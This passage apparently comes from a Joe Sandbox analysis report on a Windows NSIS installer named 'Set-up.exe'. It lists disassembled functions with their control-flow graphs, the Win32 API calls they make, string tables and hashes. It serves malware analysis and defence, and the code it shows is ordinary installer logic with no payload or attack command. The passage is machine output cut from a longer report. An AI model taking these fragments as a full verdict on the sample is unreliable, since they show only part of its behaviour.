                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                      • String ID: New install of "%s" to "%s"${
                                      • API String ID: 2110491804-1641061399
                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                      Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                      APIs
                                      • #17.COMCTL32 ref: 004038CE
                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                      • API String ID: 2435955865-3712954417
                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                      Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                      APIs
                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: jF
                                      • API String ID: 2295610775-3349280890
                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                      Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc
                                      • String ID:
                                      • API String ID: 310444273-0
                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                      Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                      APIs
                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                      • ShowWindow.USER32(?), ref: 00401753
                                      • ShowWindow.USER32(?), ref: 00401767
                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                      Strings
                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                      • Rename: %s, xrefs: 004018F8
                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                      • SetFileAttributes failed., xrefs: 004017A1
                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                      • Call: %d, xrefs: 0040165A
                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                      • Sleep(%d), xrefs: 0040169D
                                      • Rename failed: %s, xrefs: 0040194B
                                      • Rename on reboot: %s, xrefs: 00401943
                                      • BringToFront, xrefs: 004016BD
                                      • detailprint: %s, xrefs: 00401679
                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                      • Jump: %d, xrefs: 00401602
                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                      • Aborting: "%s", xrefs: 0040161D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                      • API String ID: 2872004960-3619442763
                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                      Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                      • ShowWindow.USER32(?), ref: 004054FE
                                      • DestroyWindow.USER32 ref: 00405512
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                      • EnableWindow.USER32(?,?), ref: 00405783
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID:
                                      • API String ID: 3282139019-0
                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                      Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                      APIs
                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
